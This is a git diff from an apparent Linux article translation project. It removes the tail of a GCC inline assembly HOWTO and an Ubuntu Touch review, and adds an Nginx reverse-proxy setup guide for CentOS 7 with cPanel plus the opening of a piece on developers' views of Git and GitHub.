-If our assembly statement must execute where we put it, (i.e. must not be moved out of a loop as an optimization), put the keyword `volatile` after asm and before the ()’s. So to keep it from moving, deleting and all, we declare it as
-
-`asm volatile ( ... : ... : ... : ...);`
-
-Use `__volatile__` when we have to be verymuch careful.
-
-If our assembly is just for doing some calculations and doesn’t have any side effects, it’s better not to use the keyword `volatile`. Avoiding it helps gcc in optimizing the code and making it more beautiful.
-
-In the section `Some Useful Recipes`, I have provided many examples for inline asm functions. There we can see the clobber-list in detail.
-
-* * *
-
-## 6. More about constraints.
-
-By this time, you might have understood that constraints have got a lot to do with inline assembly. But we’ve said little about constraints. Constraints can say whether an operand may be in a register, and which kinds of register; whether the operand can be a memory reference, and which kinds of address; whether the operand may be an immediate constant, and which possible values (ie range of values) it may have.... etc.
-
-## 6.1 Commonly used constraints.
-
-There are a number of constraints of which only a few are used frequently. We’ll have a look at those constraints.
-
-1. **Register operand constraint(r)**
-
- When operands are specified using this constraint, they get stored in General Purpose Registers(GPR). Take the following example:
-
- `asm ("movl %%eax, %0\n" :"=r"(myval));`
-
- Here the variable myval is kept in a register, the value in register `eax` is copied onto that register, and the value of `myval` is updated into the memory from this register. When the "r" constraint is specified, gcc may keep the variable in any of the available GPRs. To specify the register, you must directly specify the register names by using specific register constraints. They are:
-
- > `
- >
- >
+---+--------------------+
- > | r | Register(s) |
- > +---+--------------------+
- > | a | %eax, %ax, %al |
- > | b | %ebx, %bx, %bl |
- > | c | %ecx, %cx, %cl |
- > | d | %edx, %dx, %dl |
- > | S | %esi, %si |
- > | D | %edi, %di |
- > +---+--------------------+
- >
- >
- > `
-
-2. **Memory operand constraint(m)**
-
- When the operands are in the memory, any operations performed on them will occur directly in the memory location, as opposed to register constraints, which first store the value in a register to be modified and then write it back to the memory location. But register constraints are usually used only when they are absolutely necessary for an instruction or they significantly speed up the process. Memory constraints can be used most efficiently in cases where a C variable needs to be updated inside "asm" and you really don’t want to use a register to hold its value. For example, the value of idtr is stored in the memory location loc:
-
- `asm("sidt %0\n" : :"m"(loc));`
-
-3. **Matching(Digit) constraints**
-
- In some cases, a single variable may serve as both the input and the output operand. Such cases may be specified in "asm" by using matching constraints.
-
- `asm ("incl %0" :"=a"(var):"0"(var));`
-
- We saw similar examples in operands subsection also. In this example for matching constraints, the register %eax is used as both the input and the output variable. var input is read to %eax and updated %eax is stored in var again after increment. "0" here specifies the same constraint as the 0th output variable. That is, it specifies that the output instance of var should be stored in %eax only. This constraint can be used:
-
- * In cases where input is read from a variable or the variable is modified and modification is written back to the same variable.
- * In cases where separate instances of input and output operands are not necessary.
-
- The most important effect of using matching restraints is that they lead to the efficient use of available registers.
-
-Some other constraints used are:
-
-1. "m" : A memory operand is allowed, with any kind of address that the machine supports in general.
-2. "o" : A memory operand is allowed, but only if the address is offsettable. ie, adding a small offset to the address gives a valid address.
-3. "V" : A memory operand that is not offsettable. In other words, anything that would fit the `m’ constraint but not the `o’constraint.
-4. "i" : An immediate integer operand (one with constant value) is allowed. This includes symbolic constants whose values will be known only at assembly time.
-5. "n" : An immediate integer operand with a known numeric value is allowed. Many systems cannot support assembly-time constants for operands less than a word wide. Constraints for these operands should use ’n’ rather than ’i’.
-6. "g" : Any register, memory or immediate integer operand is allowed, except for registers that are not general registers.
-
-Following constraints are x86 specific.
-
-1. "r" : Register operand constraint, look table given above.
-2. "q" : Registers a, b, c or d.
-3. "I" : Constant in range 0 to 31 (for 32-bit shifts).
-4. "J" : Constant in range 0 to 63 (for 64-bit shifts).
-5. "K" : 0xff.
-6. "L" : 0xffff.
-7. "M" : 0, 1, 2, or 3 (shifts for lea instruction).
-8. "N" : Constant in range 0 to 255 (for out instruction).
-9. "f" : Floating point register
-10. "t" : First (top of stack) floating point register
-11. "u" : Second floating point register
-12. "A" : Specifies the `a’ or `d’ registers. This is primarily useful for 64-bit integer values intended to be returned with the `d’ register holding the most significant bits and the `a’ register holding the least significant bits.
-
-## 6.2 Constraint Modifiers.
-
-While using constraints, for more precise control over the effects of constraints, GCC provides us with constraint modifiers. Mostly used constraint modifiers are
-
-1. "=" : Means that this operand is write-only for this instruction; the previous value is discarded and replaced by output data.
-2. "&" : Means that this operand is an earlyclobber operand, which is modified before the instruction is finished using the input operands. Therefore, this operand may not lie in a register that is used as an input operand or as part of any memory address. An input operand can be tied to an earlyclobber operand if its only use as an input occurs before the early result is written.
-
- The list and explanation of constraints is by no means complete. Examples can give a better understanding of the use and usage of inline asm. In the next section we’ll see some examples, there we’ll find more about clobber-lists and constraints.
-
-* * *
-
-## 7. Some Useful Recipes.
-
-Now we have covered the basic theory about GCC inline assembly, now we shall concentrate on some simple examples. It is always handy to write inline asm functions as MACRO’s. We can see many asm functions in the kernel code. (/usr/src/linux/include/asm/*.h).
-
-1. First we start with a simple example. We’ll write a program to add two numbers.
-
- > `
- >
- > * * *
- >
- >
- >
- > * * *
- >
- > `
-
- Here we insist GCC to store foo in %eax, bar in %ebx and we also want the result in %eax. The ’=’ sign shows that it is an output register. Now we can add an integer to a variable in some other way.
-
- > `
- >
- > * * *
- >
- >
- >
- > * * *
- >
- > `
-
- This is an atomic addition. We can remove the instruction ’lock’ to remove the atomicity. In the output field, "=m" says that my_var is an output and it is in memory. Similarly, "ir" says that, my_int is an integer and should reside in some register (recall the table we saw above). No registers are in the clobber list.
-
-2. Now we’ll perform some action on some registers/variables and compare the value.
-
- > `
- >
- > * * *
- >
- >
- >
- > * * *
- >
- > `
-
- Here, the value of my_var is decremented by one and if the resulting value is `0` then, the variable cond is set. We can add atomicity by adding an instruction "lock;\n\t" as the first instruction in assembler template.
-
- In a similar way we can use "incl %0" instead of "decl %0", so as to increment my_var.
-
- Points to note here are that (i) my_var is a variable residing in memory. (ii) cond is in any of the registers eax, ebx, ecx and edx. The constraint "=q" guarantees it. (iii) And we can see that memory is there in the clobber list. ie, the code is changing the contents of memory.
-
-3. How to set/clear a bit in a register? As next recipe, we are going to see it.
-
- > `
- >
- > * * *
- >
- >
- >
- > * * *
- >
- > `
-
- Here, the bit at the position ’pos’ of variable at ADDR ( a memory variable ) is set to `1` We can use ’btrl’ for ’btsl’ to clear the bit. The constraint "Ir" of pos says that, pos is in a register, and it’s value ranges from 0-31 (x86 dependant constraint). ie, we can set/clear any bit from 0th to 31st of the variable at ADDR. As the condition codes will be changed, we are adding "cc" to clobberlist.
-
-4. Now we look at some more complicated but useful function. String copy.
-
- > `
- >
- > * * *
- >
- >
- >
- > * * *
- >
- > `
-
- The source address is stored in esi, destination in edi, and then starts the copy, when we reach at **0**, copying is complete. Constraints "&S", "&D", "&a" say that the registers esi, edi and eax are early clobber registers, ie, their contents will change before the completion of the function. Here also it’s clear that why memory is in clobberlist.
-
- We can see a similar function which moves a block of double words. Notice that the function is declared as a macro.
-
- > `
- >
- > * * *
- >
- >
- >
- > * * *
- >
- > `
-
- Here we have no outputs, so the changes that happen to the contents of the registers ecx, esi and edi are side effects of the block movement. So we have to add them to the clobber list.
-
-5. In Linux, system calls are implemented using GCC inline assembly. Let us look how a system call is implemented. All the system calls are written as macros (linux/unistd.h). For example, a system call with three arguments is defined as a macro as shown below.
-
- > `
- >
- > * * *
- >
- >
- >
- > * * *
- >
- > `
-
- Whenever a system call with three arguments is made, the macro shown above is used to make the call. The syscall number is placed in eax, then each parameters in ebx, ecx, edx. And finally "int 0x80" is the instruction which makes the system call work. The return value can be collected from eax.
-
- Every system calls are implemented in a similar way. Exit is a single parameter syscall and let’s see how it’s code will look like. It is as shown below.
-
- > `
- >
- > * * *
- >
- >
{
- > asm("movl $1,%%eax; /* SYS_exit is 1 */
- > xorl %%ebx,%%ebx; /* Argument is in ebx, it is 0 */
- > int $0x80" /* Enter kernel mode */
- > );
- > }
- >
- >
- > * * *
- >
- > `
-
- The number of exit is "1" and here, it’s parameter is 0\. So we arrange eax to contain 1 and ebx to contain 0 and by `int $0x80`, the `exit(0)` is executed. This is how exit works.
-
-* * *
-
-## 8. Concluding Remarks.
-
-This document has gone through the basics of GCC Inline Assembly. Once you have understood the basic concept it is not difficult to take steps by your own. We saw some examples which are helpful in understanding the frequently used features of GCC Inline Assembly.
-
-GCC Inlining is a vast subject and this article is by no means complete. More details about the syntax’s we discussed about is available in the official documentation for GNU Assembler. Similarly, for a complete list of the constraints refer to the official documentation of GCC.
-
-And of-course, the Linux kernel use GCC Inline in a large scale. So we can find many examples of various kinds in the kernel sources. They can help us a lot.
-
-If you have found any glaring typos, or outdated info in this document, please let us know.
-
-* * *
-
-## 9. References.
-
-1. [Brennan’s Guide to Inline Assembly](http://www.delorie.com/djgpp/doc/brennan/brennan_att_inline_djgpp.html)
-2. [Using Assembly Language in Linux](http://linuxassembly.org/articles/linasm.html)
-3. [Using as, The GNU Assembler](http://www.gnu.org/manual/gas-2.9.1/html_mono/as.html)
-4. [Using and Porting the GNU Compiler Collection (GCC)](http://gcc.gnu.org/onlinedocs/gcc_toc.html)
-5. [Linux Kernel Source](http://ftp.kernel.org/)
-
-* * *
-via: http://www.ibiblio.org/gferg/ldp/GCC-Inline-Assembly-HOWTO.html
-
- 作者:[Sandeep.S](mailto:busybox@sancharnet.in) 译者:[](https://github.com/) 校对:[]()
-
-本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创翻译,[Linux中国](http://linux.cn/) 荣誉推出
diff --git a/sources/tech/20151227 Ubuntu Touch, three years later.md b/sources/tech/20151227 Ubuntu Touch, three years later.md
deleted file mode 100644
index 3d467163cf..0000000000
--- a/sources/tech/20151227 Ubuntu Touch, three years later.md
+++ /dev/null
@@ -1,68 +0,0 @@
-Back in early 2013, your editor [dedicated a sacrificial handset][2] to the testing of the then-new Ubuntu Touch distribution. At that time, things were so unbaked that the distribution came with mocked-up data for unready apps; it even came with a set of fake tweets. Nearly three years later, it seemed time to give Ubuntu Touch another try on another sacrificial device. This distribution has certainly made some progress in those years, but, sadly, it still seems far from being a competitive offering in this space.
-In particular, your editor tested version 16.04r3 from the testing channel on a Nexus 4 handset. The Nexus 4 is certainly past its prime at the end of 2015, but it still functions as a credible Android device. It is, in any case, the only phone handset on [the list of supported devices][1] other than the three that were sold (in locations far from your editor's home) with Ubuntu Touch pre-installed. It is a bit discouraging that Ubuntu Touch is not supported on a more recent device; the Nexus 4 was discontinued over two years ago.
-
-People who are accustomed to putting strange systems on Nexus devices know the drill fairly well: unlock the bootloader, install a new recovery image if necessary, then use the **fastboot** tool to flash a new image. Ubuntu Touch does not work that way; instead, one must use a set of tools available only on the Ubuntu desktop distribution. Your editor's current menagerie of systems does not include any of those, but, fortunately, running the Ubuntu 15.10 distribution off a USB drive works just fine. It must be said, though, that Ubuntu appears not to have gotten the memo regarding high-DPI laptop displays; 15.10 is an exercise in eyestrain on such a device.
-
-Once the requisite packages have been installed, the **ubuntu-device-flash** command can be used to install Ubuntu Touch on the phone. It finds the installation image wherever Canonical hides them (it's not obvious where that is) and puts it onto the phone; the process, on the Nexus 4, took about three hours — a surprisingly long time. Among other things, it installs a Ubuntu-specific recovery image, regardless of whether that should be necessary or not. The installation takes up about 4.5GB of space on the device. At the end, the phone reboots and comes up with the Ubuntu Touch lock screen, which has changed little in the last three years. The first boot takes a discouragingly long time, but subsequent reboots are faster, perhaps faster than Android on the same device.
-
-Alas, that's about the only thing that is faster than Android. The phone starts sluggish and gets worse as time goes on. At one point it took a solid minute to get the dialer screen up on the running device. Scrolling can be jerky and unpleasant to work with. At least once, the phone bogged down to the point that there was little alternative to shutting it down and starting over.
-
-Logging into the device over the USB connection offers some clues as to why that might be. There were no less than 258 processes running on the system. A number of them have "evolution" in their name, which is never a good sign even on a heftier system. Daemons like NetworkManager and pulseaudio are running. In general, Ubuntu Touch seems to have a large number of relatively large moving parts, leading, seemingly, to memory pressure and a certain amount of thrashing.
-
-Three years ago, Ubuntu Touch was built on an Android chassis. There are still bits of Android that show up here and there (it uses binder, for example), but a number of those components have been replaced. This release runs an Android-derived kernel that identifies itself as "3.4.0-7 #39-Ubuntu". 3.4.0 was released in May 2012, so it is getting a bit long in the tooth; the 3.4.0 number suggests this kernel hasn't even gotten the stable updates that followed that release. Finding the source for the kernel in this distribution is not easy; it must almost certainly be hidden somewhere in this Gerrit repository, but your editor ran out of time while trying to find it. The SurfaceFlinger display manager has been replaced by Ubuntu's own Mir, with Unity providing the interface. Upstart is the init system, despite the fact that Ubuntu has moved to systemd on desktop systems.
-
-When one moves beyond the command-line interface and starts playing with the touchscreen, one finds that the basics of the interface resemble what was demonstrated three years ago. Swiping from the left edge brings the [Overview screen] Unity icon bar (but no longer switches to a home screen; the "home screen" concept doesn't really seem to exist anymore). Swiping from the right will either switch to another application or produce an overview of running applications; it's not clear how it decides which. The overview provides a cute oblique view of the running applications; it's sufficient to choose one, but seems somewhat wasteful of screen space. Swiping up from the bottom produces an application-specific menu — usually.
-
-![][3]
-
-
-The swipe gestures work well enough once one gets used to them, but there is scope for confusion. The camera app, for example, will instruct the user to "swipe left for photo roll," but, unless one is careful to avoid [Swipe left] the right edge of the screen, that gesture will yield the overview screen instead. One can learn subtleties like "swipes involving the edge" and "swipes avoiding the edge," but one could argue that such an interface is more difficult than it needs to be and less discoverable than it could be.
-
-![][4]
-
-Speaking of the camera app, it takes pictures as one might expect, and it has gained a high-dynamic-range mode in recent years. It still has no support for stitching together photos in a panorama or "photo sphere" mode, though.
-
-![][5]
-
-The base distribution comes with a fairly basic set of apps. Many of them appear to be interfaces to an associated web page; the Amazon, GMail, and Facebook apps, for example. Something called "Shorts" appears to be an RSS reader, though it seems impervious to the addition of arbitrary feeds. There is a terminal app, but it prompts for a password — a bit surprising [Terminal emulator] given that no password had ever been supplied for the device (it turns out that one should use the screen-lock PIN here). It's not clear that this extra level of "security" is helpful, given that the user involved is already able to install, launch, and run applications on the device, but so it goes.
-
-Despite the presence of all those evolution processes, there is no IMAP-capable email app; there are also no mapping apps. There is a rudimentary web browser with Ubuntu branding; it appears that this browser is based on Chromium. The weather app is limited to a few dozen hardwired locations worldwide; the closest supported location to LWN headquarters was Houston, which, one assumes, is unlikely to be dealing with the foot of snow your editor had to shovel while partway through this article. One suspects we would have heard about that.
-
-![][6]
-
-Inevitably, there is a store from which one can obtain other apps. There are, for example, a couple of seemingly capable, OpenStreetMap-based mapping apps there, including one that claims turn-by-turn navigation, but nothing requiring GPS access worked in your editor's tests. Games abound, of course, but [Maps] there is little in the way of apps that are well known in the Android or iOS worlds. The store will refuse to allow the installation of apps until one creates a "Ubuntu One" account; that is unfortunate, but most Android users never get anywhere near that far before having to create or supply a Google account.
-
-![][7]
-
-Canonical puts a fair amount of energy into promoting its "scopes," which are said to be better than apps for the aggregation of content. In truth, they seem to just be another type of app with a focus on gathering information from more than one source. Although, with "branded scopes," the "more than one source" part is often deliberately put by the wayside. Your editor played around with scopes for a while, but, in truth, could not find what was supposed to make them special.
-
-Permissions management in Ubuntu Touch resembles that found in recent Android releases: the user will be prompted the first time an application tries to exercise a specific privilege. As with Android, the number of [Permissions request] actions requiring privilege is relatively small, and "connect to any arbitrary site on the Internet" is not among them. Access to location information or the camera, though, will generate a prompt. There is also, again as with Android, a way to control which applications are allowed to place notifications on the screen.
-
-Ubuntu Touch still seems to drain the battery far more quickly than Android does on the same device. Indeed, it is barely able to get through the night while sitting idle. There is a cute battery app that offers a couple of "ways to reduce battery use," but it lacks Android's ability to say which apps are actually draining the battery (though, it must be said, that information from Android is often less helpful than one might hope).
-
-![][8]
-
-The keyboard now has proper multi-lingual support (though there is no visual indication of which language is currently in effect) and, as with Android, one can switch between languages on the fly. It offers word suggestions, does [Keyboard] spelling correction, and all the usual things. One missing feature, though, is "swipe" typing which, your editor has found, can speed the process of inputting text on a small keyboard considerably. There is also no voice input; no major loss from your editor's point of view, but others will probably see that differently.
-
-There is a lot to like in Ubuntu Touch. There is some appeal to running something that looks like a proper Linux system, even if it still has a number of Ubuntu-specific components. One does not get the sense that the device is watching quite as closely as Android devices do, though it's not entirely clear, for example, what happens with location data or where it might be stored. In any case, a Ubuntu device clearly has more free software on it than most alternatives do; there is no proprietary "play services" layer maintaining control over the system.
-
-Sadly, though, this distribution still is not up to the capabilities and the performance of the big alternatives. Switching to Ubuntu Touch means settling for a much slower system, running on a severely limited set of devices, with a relative scarcity of apps to choose from. Your editor would very much like to see a handset distribution that is more free and more open than the alternatives, but that distribution must also be competitive with those alternatives, and that does not seem to be the case here. Unless Canonical can find a way to close the performance and feature gaps with Android, it seems unlikely to have much hope of achieving uptake that is within a few orders of magnitude of Android's.
-
---------------------------------------
-
-via: https://lwn.net/Articles/667983/
-
-作者:Jonathan Corbet
-译者:[译者ID](https://github.com/译者ID)
-校对:[校对者ID](https://github.com/校对者ID)
-
-本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创翻译,[Linux中国](https://linux.cn/) 荣誉推出
-
-[1]: https://developer.ubuntu.com/en/start/ubuntu-for-devices/devices/
-[2]: https://lwn.net/Articles/540138/
-[3]: https://static.lwn.net/images/2015/utouch/overview-sm.png
-[4]: https://static.lwn.net/images/2015/utouch/camera-swipe-sm.png
-[5]: https://static.lwn.net/images/2015/utouch/terminal.png
-[6]: https://static.lwn.net/images/2015/utouch/gps-sm.png
-[7]: https://static.lwn.net/images/2015/utouch/camera-perm.png
-[8]: https://static.lwn.net/images/2015/utouch/schifo.png
diff --git a/sources/tech/20160104 What is good stock portfolio management software on Linux.md b/sources/tech/20160104 What is good stock portfolio management software on Linux.md
index b7c372ce71..258cf104fc 100644
--- a/sources/tech/20160104 What is good stock portfolio management software on Linux.md
+++ b/sources/tech/20160104 What is good stock portfolio management software on Linux.md
@@ -1,4 +1,3 @@
-translating by fw8899
What is good stock portfolio management software on Linux
================================================================================
If you are investing in the stock market, you probably understand the importance of a sound portfolio management plan. The goal of portfolio management is to come up with the best investment plan tailored for you, considering your risk tolerance, time horizon and financial goals. Given its importance, no wonder there are no shortage of commercial portfolio management apps and stock market monitoring software, each touting various sophisticated portfolio performance tracking and reporting capabilities.
diff --git a/sources/tech/20160218 How to Set Nginx as Reverse Proxy on Centos7 CPanel.md b/sources/tech/20160218 How to Set Nginx as Reverse Proxy on Centos7 CPanel.md
new file mode 100644
index 0000000000..dc21bc0b23
--- /dev/null
+++ b/sources/tech/20160218 How to Set Nginx as Reverse Proxy on Centos7 CPanel.md
@@ -0,0 +1,203 @@
+zky001开始翻译
+
+How to Set Nginx as Reverse Proxy on Centos7 CPanel
+================================================================================
+
+Nginx is one of the fastest and most powerful web-server. It is known for its high performance and low resource utilization. It can be installed as both a standalone and a Reverse Proxy Web-server. In this article, I'm discussing about the installation of Nginx as a reverse proxy along with Apache on a CPanel server with latest CentOS 7 installed.
+
+Nginx as a reverse proxy will work as a frontend webserver serving static contents along with Apache serving the dynamic files in backend. This setup will boost up the overall server performance.
+
+Let's walk through the installation steps for Nginx as reverse proxy in CentOS7 x86_64 bit server with cPanel 11.52 installed.
+
+First of all, we need to install the EPEL repo to start-up with the process.
+
+### Step 1: Install the EPEL repo. ###
+
+ root@server1 [/usr]# yum -y install epel-release
+ Loaded plugins: fastestmirror, tsflags, universal-hooks
+ Loading mirror speeds from cached hostfile
+ * EA4: 66.23.237.210
+ * base: mirrors.linode.com
+ * extras: mirrors.linode.com
+ * updates: mirrors.linode.com
+ Resolving Dependencies
+ --> Running transaction check
+ ---> Package epel-release.noarch 0:7-5 will be installed
+ --> Finished Dependency Resolution
+
+ Dependencies Resolved
+
+ ===============================================================================================================================================
+ Package Arch Version Repository Size
+ ===============================================================================================================================================
+ Installing:
+ epel-release noarch 7-5 extras 14 k
+
+### Step 2: After installing the repo, we can start with the installation of the nDeploy RPM repo for CentOS to install our required nDeploy Webstack and Nginx plugin. ###
+
+ root@server1 [/usr]# yum -y install http://rpm.piserve.com/nDeploy-release-centos-1.0-1.noarch.rpm
+ Loaded plugins: fastestmirror, tsflags, universal-hooks
+ nDeploy-release-centos-1.0-1.noarch.rpm | 1.7 kB 00:00:00
+ Examining /var/tmp/yum-root-ei5tWJ/nDeploy-release-centos-1.0-1.noarch.rpm: nDeploy-release-centos-1.0-1.noarch
+ Marking /var/tmp/yum-root-ei5tWJ/nDeploy-release-centos-1.0-1.noarch.rpm to be installed
+ Resolving Dependencies
+ --> Running transaction check
+ ---> Package nDeploy-release-centos.noarch 0:1.0-1 will be installed
+ --> Finished Dependency Resolution
+
+ Dependencies Resolved
+
+ ===============================================================================================================================================
+ Package Arch Version Repository Size
+ ===============================================================================================================================================
+ Installing:
+ nDeploy-release-centos noarch 1.0-1 /nDeploy-release-centos-1.0-1.noarch 110
+
+### Step 3: Install the nDeploy and Nginx nDeploy plugins. ###
+
+ root@server1 [/usr]# yum --enablerepo=ndeploy install nginx-nDeploy nDeploy
+ Loaded plugins: fastestmirror, tsflags, universal-hooks
+ epel/x86_64/metalink | 9.9 kB 00:00:00
+ epel | 4.3 kB 00:00:00
+ ndeploy | 2.9 kB 00:00:00
+ (1/4): ndeploy/7/x86_64/primary_db | 14 kB 00:00:00
+ (2/4): epel/x86_64/group_gz | 169 kB 00:00:00
+ (3/4): epel/x86_64/primary_db | 3.7 MB 00:00:02
+
+ Dependencies Resolved
+
+ ===============================================================================================================================================
+ Package Arch Version Repository Size
+ ===============================================================================================================================================
+ Installing:
+ nDeploy noarch 2.0-11.el7 ndeploy 80 k
+ nginx-nDeploy x86_64 1.8.0-34.el7 ndeploy 36 M
+ Installing for dependencies:
+ PyYAML x86_64 3.10-11.el7 base 153 k
+ libevent x86_64 2.0.21-4.el7 base 214 k
+ memcached x86_64 1.4.15-9.el7 base 84 k
+ python-inotify noarch 0.9.4-4.el7 base 49 k
+ python-lxml x86_64 3.2.1-4.el7 base 758 k
+
+ Transaction Summary
+ ===============================================================================================================================================
+ Install 2 Packages (+5 Dependent packages)
+
+With these steps, we've completed with the installation of Nginx plugin in our server. Now we need to configure Nginx as reverse proxy and create the virtualhost for the existing cPanel user accounts. For that we can run the following script.
+
+### Step 4: To enable Nginx as a front end Web Server and create the default configuration files. ###
+
+ root@server1 [/usr]# /opt/nDeploy/scripts/cpanel-nDeploy-setup.sh enable
+ Modifying apache http and https port in cpanel
+
+ httpd restarted successfully.
+ Created symlink from /etc/systemd/system/multi-user.target.wants/nginx.service to /usr/lib/systemd/system/nginx.service.
+ Created symlink from /etc/systemd/system/multi-user.target.wants/ndeploy_watcher.service to /usr/lib/systemd/system/ndeploy_watcher.service.
+ Created symlink from /etc/systemd/system/multi-user.target.wants/ndeploy_backends.service to /usr/lib/systemd/system/ndeploy_backends.service.
+ ConfGen:: saheetha
+ ConfGen:: satest
+
+As you can see these script will modify the Apache port from 80 to another port to make Nginx run as a front end web server and create the virtual host configuration files for the existing cPanel accounts. Once it is done, confirm the status of both Apache and Nginx.
+
+### Apache Status: ###
+
+ root@server1 [/var/run/httpd]# systemctl status httpd
+ ● httpd.service - Apache Web Server
+ Loaded: loaded (/usr/lib/systemd/system/httpd.service; enabled; vendor preset: disabled)
+ Active: active (running) since Mon 2016-01-18 06:34:23 UTC; 12s ago
+ Process: 25606 ExecStart=/usr/sbin/apachectl start (code=exited, status=0/SUCCESS)
+ Main PID: 24760 (httpd)
+ CGroup: /system.slice/httpd.service
+ ‣ 24760 /usr/local/apache/bin/httpd -k start
+
+ Jan 18 06:34:23 server1.centos7-test.com systemd[1]: Starting Apache Web Server...
+ Jan 18 06:34:23 server1.centos7-test.com apachectl[25606]: httpd (pid 24760) already running
+ Jan 18 06:34:23 server1.centos7-test.com systemd[1]: Started Apache Web Server.
+
+### Nginx Status: ###
+
+ root@server1 [~]# systemctl status nginx
+ ● nginx.service - nginx-nDeploy - high performance web server
+ Loaded: loaded (/usr/lib/systemd/system/nginx.service; enabled; vendor preset: disabled)
+ Active: active (running) since Sun 2016-01-17 17:18:29 UTC; 13h ago
+ Docs: http://nginx.org/en/docs/
+ Main PID: 3833 (nginx)
+ CGroup: /system.slice/nginx.service
+ ├─ 3833 nginx: master process /usr/sbin/nginx -c /etc/nginx/nginx.conf
+ ├─25473 nginx: worker process
+ ├─25474 nginx: worker process
+ └─25475 nginx: cache manager process
+
+ Jan 17 17:18:29 server1.centos7-test.com systemd[1]: Starting nginx-nDeploy - high performance web server...
+ Jan 17 17:18:29 server1.centos7-test.com nginx[3804]: nginx: the configuration file /etc/nginx/nginx.conf syntax is ok
+ Jan 17 17:18:29 server1.centos7-test.com nginx[3804]: nginx: configuration file /etc/nginx/nginx.conf test is successful
+ Jan 17 17:18:29 server1.centos7-test.com systemd[1]: Started nginx-nDeploy - high performance web server.
+
+Nginx act as a frontend webserver running on port 80 and Apache configuration is modified to listen on http port 9999 and https port 4430. Please see their status below:
+
+ root@server1 [/usr/local/src]# netstat -plan | grep httpd
+ tcp 0 0 0.0.0.0:4430 0.0.0.0:* LISTEN 17270/httpd
+ tcp 0 0 0.0.0.0:9999 0.0.0.0:* LISTEN 17270/httpd
+ tcp6 0 0 :::4430 :::* LISTEN 17270/httpd
+ tcp6 0 0 :::9999 :::* LISTEN 17270/httpd
+
+![apacheport](http://blog.linoxide.com/wp-content/uploads/2016/01/apacheport.png)
+
+ root@server1 [/usr/local/src]# netstat -plan | grep nginx
+ tcp 0 0 127.0.0.1:80 0.0.0.0:* LISTEN 17802/nginx: master
+ tcp 0 0 45.79.183.73:80 0.0.0.0:* LISTEN 17802/nginx: master
+
+The virtualhost entries created for the existing users as located in the folder "**/etc/nginx/sites-enabled**". This file path is included in the Nginx main configuration file.
+
+ root@server1 [/etc/nginx/sites-enabled]# ll | grep .conf
+ -rw-r--r-- 1 root root 311 Jan 17 09:02 saheetha.com.conf
+ -rw-r--r-- 1 root root 336 Jan 17 09:02 saheethastest.com.conf
+
+### Sample Vhost for a domain: ###
+
+ server {
+
+ listen 45.79.183.73:80;
+ #CPIPVSIX:80;
+
+ # ServerNames
+ server_name saheetha.com www.saheetha.com;
+ access_log /usr/local/apache/domlogs/saheetha.com main;
+ access_log /usr/local/apache/domlogs/saheetha.com-bytes_log bytes_log;
+
+ include /etc/nginx/sites-enabled/saheetha.com.include;
+
+ }
+
+We can confirm the working of the web server status by calling a website in the browser. Please see the web server information on my server after the installation.
+
+ root@server1 [/home]# ip a | grep -i eth0
+ 3: eth0: mtu 1500 qdisc pfifo_fast state UP qlen 1000
+ inet 45.79.183.73/24 brd 45.79.183.255 scope global dynamic eth0
+ root@server1 [/home]# nginx -v
+ nginx version: nginx/1.8.0
+
+![webserver-status](http://blog.linoxide.com/wp-content/uploads/2016/01/webserver.png)
+
+Nginx will create the virtual host automatically for any newly created accounts in cPanel. With these simple steps we can configure Nginx as reverse proxy on a CentOS 7/CPanel server.
+
+### Advantages of Nginx as Reverse Proxy: ###
+
+ 1. Easy to install and configure
+ 2. Performance and efficiency
+ 3. Prevent DDOS attacks
+ 4. Allows .htaccess PHP rewrite rules
+
+I hope this article is useful for you guys. Thank you for referring to this. I would appreciate your valuable comments and suggestions on this for further improvements.
+
+--------------------------------------------------------------------------------
+
+via: http://linoxide.com/linux-how-to/set-nginx-reverse-proxy-centos-7-cpanel/
+
+作者:[Saheetha Shameer][a]
+译者:[译者ID](https://github.com/译者ID)
+校对:[校对者ID](https://github.com/校对者ID)
+
+本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
+
+[a]:http://linoxide.com/author/saheethas/
diff --git a/sources/tech/20160218 What do Linux developers think of Git and GitHub.md b/sources/tech/20160218 What do Linux developers think of Git and GitHub.md
new file mode 100644
index 0000000000..b444b0958c
--- /dev/null
+++ b/sources/tech/20160218 What do Linux developers think of Git and GitHub.md
@@ -0,0 +1,95 @@
+@4357 翻译中
+
+What do Linux developers think of Git and GitHub?
+=====================================================
+
+**Also in today’s open source roundup: DistroWatch reviews XStream Desktop 153, and Street Fighter V is coming to Linux and SteamOS in the spring**
+
+## What do Linux developers think of Git and GitHub?
+
+The popularity of Git and GitHub among Linux developers is well established. But what do developers think of them? And should GitHub really be synonymous with Git itself? A Linux redditor recently asked about this and got some very interesting answers.
+
+Dontwakemeup46 asked his question:
+
+>I am learning Git and Github. What I am interested in is how these two are viewed by the community. That git and github are used extensively, is something I know. But are there serious issues with either Git or Github? Something that the community would love to change?
+
+[More at Reddit](http://api.viglink.com/api/click?format=go&jsonp=vglnk_145580413015211&key=0a7039c08493c7c51b759e3d13019dbe&libId=iksc5hc8010113at000DL3yrsuvp7&loc=http%3A%2F%2Fwww.infoworld.com%2Farticle%2F3033059%2Flinux%2Fwhat-do-linux-developers-think-of-git-and-github.html&v=1&out=https%3A%2F%2Fwww.reddit.com%2Fr%2Flinux%2Fcomments%2F45jy59%2Fthe_popularity_of_git_and_github%2F&ref=http%3A%2F%2Fwww.linux.com%2Fnews%2Fsoftware%2Fapplications%2F886008-what-do-linux-developers-think-of-git-and-github&title=What%20do%20Linux%20developers%20think%20of%20Git%20and%20GitHub%3F%20%7C%20InfoWorld&txt=More%20at%20Reddit)
+
+His fellow Linux redditors responded with their thoughts about Git and GitHub:
+
+>Derenir: ”Github is not affliated with Git.
+
+>Git is made by Linus Torvalds.
+
+>Github hardly supports Linux.
+
+>Github is a corporate bordelo that tries to make money from Git.
+
